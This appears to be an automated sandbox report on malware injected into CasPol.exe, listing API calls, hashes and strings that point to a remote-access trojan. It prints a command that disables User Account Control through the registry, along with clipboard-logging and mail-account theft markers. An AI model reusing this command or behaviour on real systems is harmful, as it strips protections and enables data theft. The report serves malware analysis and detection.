                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                • String ID:
                                                                                                • API String ID: 3160817290-0
                                                                                                • Opcode ID: ae40a63e46beb22daa4956e078090859b5f7183b7e2bf3c5c9b8e84b2b7f2479
                                                                                                • Instruction ID: 03a1e9305cc52ab1e573739f72da4c843e3c1f7cd4612cbd08a2c6f68691a865
                                                                                                • Opcode Fuzzy Hash: ae40a63e46beb22daa4956e078090859b5f7183b7e2bf3c5c9b8e84b2b7f2479
                                                                                                • Instruction Fuzzy Hash: F2F0F931508B1027F612777A6C46E1B15269BC17B6B26002FF509A6392EF2C8C07911D
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,00419991,00000000,00000000), ref: 00419E25
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,00419991,00000000,00000000), ref: 00419E39
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419991,00000000,00000000), ref: 00419E46
                                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419991,00000000,00000000), ref: 00419E55
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419991,00000000,00000000), ref: 00419E67
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419991,00000000,00000000), ref: 00419E6A
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: f39116070f43c8ef762b87d05958f062f452bea97bf42776bddf3ff77cc24258
                                                                                                • Instruction ID: 47980c42e9b022aba05d73d81e1ae7aa31c0ed05cef52b60765f03c540efa169
                                                                                                • Opcode Fuzzy Hash: f39116070f43c8ef762b87d05958f062f452bea97bf42776bddf3ff77cc24258
                                                                                                • Instruction Fuzzy Hash: 44F062319003186BD611AB65DC89EBF3B6CDB45BA1F01002AF906A21D2DF78DD4A95F5
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,0041988D,00000000,00000000), ref: 00419F8C
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041988D,00000000,00000000), ref: 00419FA0
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041988D,00000000,00000000), ref: 00419FAD
                                                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041988D,00000000,00000000), ref: 00419FBC
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041988D,00000000,00000000), ref: 00419FCE
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041988D,00000000,00000000), ref: 00419FD1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: 7777fcf707120254506fa4e92061de2525c9cf476e2c623219f1f225c16140d8
                                                                                                • Instruction ID: cbb6f8d25e78bf3f904679f952f169c6c08018e661e4ba535c0ca8fa304c3d8e
                                                                                                • Opcode Fuzzy Hash: 7777fcf707120254506fa4e92061de2525c9cf476e2c623219f1f225c16140d8
                                                                                                • Instruction Fuzzy Hash: 68F0C2315002147BD2116B24DC49EBF3A6CDB45BA1B01002AFA06A2192DF78CE4A85B8
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,0041990F,00000000,00000000), ref: 00419F27
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041990F,00000000,00000000), ref: 00419F3B
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041990F,00000000,00000000), ref: 00419F48
                                                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041990F,00000000,00000000), ref: 00419F57
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041990F,00000000,00000000), ref: 00419F69
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041990F,00000000,00000000), ref: 00419F6C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: c477b1fb9180f2e7e4f1d3c6d81281581987cb622c6cefb8769b920387ec4a4b
                                                                                                • Instruction ID: 95d7f5aa039a93820bb4883d7663946178ed8a5ec9cf590f88e81ba893971d89
                                                                                                • Opcode Fuzzy Hash: c477b1fb9180f2e7e4f1d3c6d81281581987cb622c6cefb8769b920387ec4a4b
                                                                                                • Instruction Fuzzy Hash: 7EF062715003147BD2116B65DC4AEBF3B6CDB45BA1B01002AFA06B2192DF78DD4A96B9
                                                                                                APIs
                                                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412AF5
                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412B24
                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412BC5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Enum$InfoQueryValue
                                                                                                • String ID: [regsplt]$TG
                                                                                                • API String ID: 3554306468-170812940
                                                                                                • Opcode ID: 6f1c1200cf41d382bc74d334893dba8ec1b7799dc295cdf88aa789aab8dc62b2
                                                                                                • Instruction ID: eeb20da9b05a32976bf12a6402f5e40020a9f6991e42d7db5c0f7bae6a1218cc
                                                                                                • Opcode Fuzzy Hash: 6f1c1200cf41d382bc74d334893dba8ec1b7799dc295cdf88aa789aab8dc62b2
                                                                                                • Instruction Fuzzy Hash: C5511E72108345AED310EF61D985DEFB7ECEF84704F00492EB585D2191EB74EA088BAA
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID: wME
                                                                                                • API String ID: 269201875-3986563984
                                                                                                • Opcode ID: 74ece5ab94bf9e1454a637eee9e3d981c9d933d52cb43566ce5b815ebd6edde4
                                                                                                • Instruction ID: 0bd1fcef5d7791e57e96aa6a4775832058b0444fd7bffa6098b49987863132bf
                                                                                                • Opcode Fuzzy Hash: 74ece5ab94bf9e1454a637eee9e3d981c9d933d52cb43566ce5b815ebd6edde4
                                                                                                • Instruction Fuzzy Hash: 64415D31900F00ABEF227AB98C9667F3A75DF01775F14411FFC1896293D63C890986AA
                                                                                                APIs
                                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                • API String ID: 4036392271-1520055953
                                                                                                • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                APIs
                                                                                                  • Part of subcall function 0041265C: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 0041267E
                                                                                                  • Part of subcall function 0041265C: RegQueryValueExW.ADVAPI32(?,0040E18D,00000000,00000000,?,00000400), ref: 0041269D
                                                                                                  • Part of subcall function 0041265C: RegCloseKey.ADVAPI32(?), ref: 004126A6
                                                                                                  • Part of subcall function 0041B366: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B377
                                                                                                  • Part of subcall function 0041B366: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B37E
                                                                                                • _wcslen.LIBCMT ref: 0041AB01
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                                                                                • API String ID: 3286818993-4246244872
                                                                                                • Opcode ID: f96227f50e5d78c7b5b45e1ee0af5fe3d836a00b2a4c6991fda99104d0e8455f
                                                                                                • Instruction ID: 944f249e3467cd2310196e71108a033bc811508d99a3a404dc4e3305fa2889c9
                                                                                                • Opcode Fuzzy Hash: f96227f50e5d78c7b5b45e1ee0af5fe3d836a00b2a4c6991fda99104d0e8455f
                                                                                                • Instruction Fuzzy Hash: 8621A772B001042BDB04B6B58C96EFE366D9B84318B10087FF452B71D3EE3C9D554269
                                                                                                APIs
                                                                                                  • Part of subcall function 00433724: EnterCriticalSection.KERNEL32(00471D18,?,00476D54,?,0040AE8B,00476D54,?,00000000,00000000), ref: 0043372F
                                                                                                  • Part of subcall function 00433724: LeaveCriticalSection.KERNEL32(00471D18,?,0040AE8B,00476D54,?,00000000,00000000), ref: 0043376C
                                                                                                  • Part of subcall function 00433AB0: __onexit.LIBCMT ref: 00433AB6
                                                                                                • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                  • Part of subcall function 004336DA: EnterCriticalSection.KERNEL32(00471D18,00476D54,?,0040AEAC,00476D54,00456FA7,?,00000000,00000000), ref: 004336E4
                                                                                                  • Part of subcall function 004336DA: LeaveCriticalSection.KERNEL32(00471D18,?,0040AEAC,00476D54,00456FA7,?,00000000,00000000), ref: 00433717
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                • String ID: [End of clipboard]$[Text copied to clipboard]$TmG$XmG
                                                                                                • API String ID: 2974294136-1855599884
                                                                                                • Opcode ID: d19b0b6e243b560cb7bf038ff63eb8a56350b46780970fd03fba1bf7d9982ec9
                                                                                                • Instruction ID: 2623299308dd9d50029d580546b1e3590cd03a5acc49d0be8ee118f943746456
                                                                                                • Opcode Fuzzy Hash: d19b0b6e243b560cb7bf038ff63eb8a56350b46780970fd03fba1bf7d9982ec9
                                                                                                • Instruction Fuzzy Hash: FB216131A102155ACB24FB65D8929EE7775AF54318F10403FF506772E2EF3C6E4A868D
                                                                                                APIs
                                                                                                • RegisterClassExA.USER32(00000030), ref: 0041CC77
                                                                                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CC92
                                                                                                • GetLastError.KERNEL32 ref: 0041CC9C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                • String ID: 0$MsgWindowClass
                                                                                                • API String ID: 2877667751-2410386613
                                                                                                • Opcode ID: 2bfcb1dee2ed81dd37ad325623522de50802513b554cdfc95296743f6fff5b81
                                                                                                • Instruction ID: c9edb97a89f7ec8dfbaa779d36c224b53f51aa00da94833f787b12e8c600820c
                                                                                                • Opcode Fuzzy Hash: 2bfcb1dee2ed81dd37ad325623522de50802513b554cdfc95296743f6fff5b81
                                                                                                • Instruction Fuzzy Hash: 2001E9B1D1021DAF8B00DF9ADCC49EFFBBDBE49355B50452AE414B6100EB708A458AA5
                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                Strings
                                                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$CreateProcess
                                                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                • API String ID: 2922976086-4183131282
                                                                                                • Opcode ID: 76fab65495b0fd8f7af94722782b38f5ec20939b495d63d65361185c7f15ad50
                                                                                                • Instruction ID: 0865c4136dfbb59e32125d892e445ee09242962a1e3dc4bc305b740a121ed375
                                                                                                • Opcode Fuzzy Hash: 76fab65495b0fd8f7af94722782b38f5ec20939b495d63d65361185c7f15ad50
                                                                                                • Instruction Fuzzy Hash: 68F090B690029D7ACB20ABD69C0EECF7F3CEBC5B11F01046ABA04A2051DA706104CAB8
                                                                                                Strings
                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, xrefs: 00406927
                                                                                                • Rmc-ET2B3I, xrefs: 0040693F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Rmc-ET2B3I
                                                                                                • API String ID: 0-2868264085
                                                                                                • Opcode ID: 440f994380ae97e7c47f4173536c55f38e93d9cb79c908ea235c8484f88855d2
                                                                                                • Instruction ID: ac3f053366391772af188fc274efb03f25e4c049f181d6a95d7665767018bac5
                                                                                                • Opcode Fuzzy Hash: 440f994380ae97e7c47f4173536c55f38e93d9cb79c908ea235c8484f88855d2
                                                                                                • Instruction Fuzzy Hash: 4FF0F6B17022109BDB103B34AD1966A3A45DB40346F01807BF98BFA6E2DF7C8851C68C
                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044279A,?,?,0044273A,?,0046EAF0,0000000C,00442891,?,00000002), ref: 00442809
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044281C
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0044279A,?,?,0044273A,?,0046EAF0,0000000C,00442891,?,00000002,00000000), ref: 0044283F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: 263cd25904221f4c100099ecbb428eb8354416072efb1e7fc04c1483da550fa7
                                                                                                • Instruction ID: e557d05a47d06e8d32a7f66c2c4e22cdfb14d47a79db446b90f8ad9ee3cbc836
                                                                                                • Opcode Fuzzy Hash: 263cd25904221f4c100099ecbb428eb8354416072efb1e7fc04c1483da550fa7
                                                                                                • Instruction Fuzzy Hash: 8CF0A430900309FBDB119F94DD09B9EBFB4EB08753F4041B9F805A2261DF789D44CA98
                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004755B0,00414F47,00000000,00000000,00000001), ref: 00404AED
                                                                                                • SetEvent.KERNEL32(00000278), ref: 00404AF9
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404B04
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00404B0D
                                                                                                  • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                • String ID: KeepAlive | Disabled
                                                                                                • API String ID: 2993684571-305739064
                                                                                                • Opcode ID: 3ad55c3dc5f6f3fe6add9deac0dab9812a85fcbbdc7a8e47626d343f98173556
                                                                                                • Instruction ID: 7c4d48bbaa8a7164c3353f7df4ad5523490a6ea0f3ebe4e46dcacb08dafaa92a
                                                                                                • Opcode Fuzzy Hash: 3ad55c3dc5f6f3fe6add9deac0dab9812a85fcbbdc7a8e47626d343f98173556
                                                                                                • Instruction Fuzzy Hash: 31F096B19047007BDB1137759D0B66B7F58AB46325F00096FF492A26F2DE39D8508B5E
                                                                                                APIs
                                                                                                  • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041A15A
                                                                                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041A168
                                                                                                • Sleep.KERNEL32(00002710), ref: 0041A16F
                                                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041A178
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                • String ID: Alarm triggered
                                                                                                • API String ID: 614609389-2816303416
                                                                                                • Opcode ID: 859fac31fcb8157fef4fccd01110b6d68f3f64b9bd70d3344d64368d38890a6d
                                                                                                • Instruction ID: 198adcd2ac8b5b4b9acde76a755fda1533c143b191b85f9fe5233f4cbfc21951
                                                                                                • Opcode Fuzzy Hash: 859fac31fcb8157fef4fccd01110b6d68f3f64b9bd70d3344d64368d38890a6d
                                                                                                • Instruction Fuzzy Hash: 79E01A22A04261379520337B7D0FD6F3D28EAC7B65741006FF905A6192EE580811C6FB
                                                                                                APIs
                                                                                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041C10D), ref: 0041C084
                                                                                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041C10D), ref: 0041C091
                                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041C10D), ref: 0041C09E
                                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041C10D), ref: 0041C0B1
                                                                                                Strings
                                                                                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041C0A4
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                • API String ID: 3024135584-2418719853
                                                                                                • Opcode ID: 1559ced9db44309d12e9096fc874ef99716f3117c459c374921cc59209bdbdc6
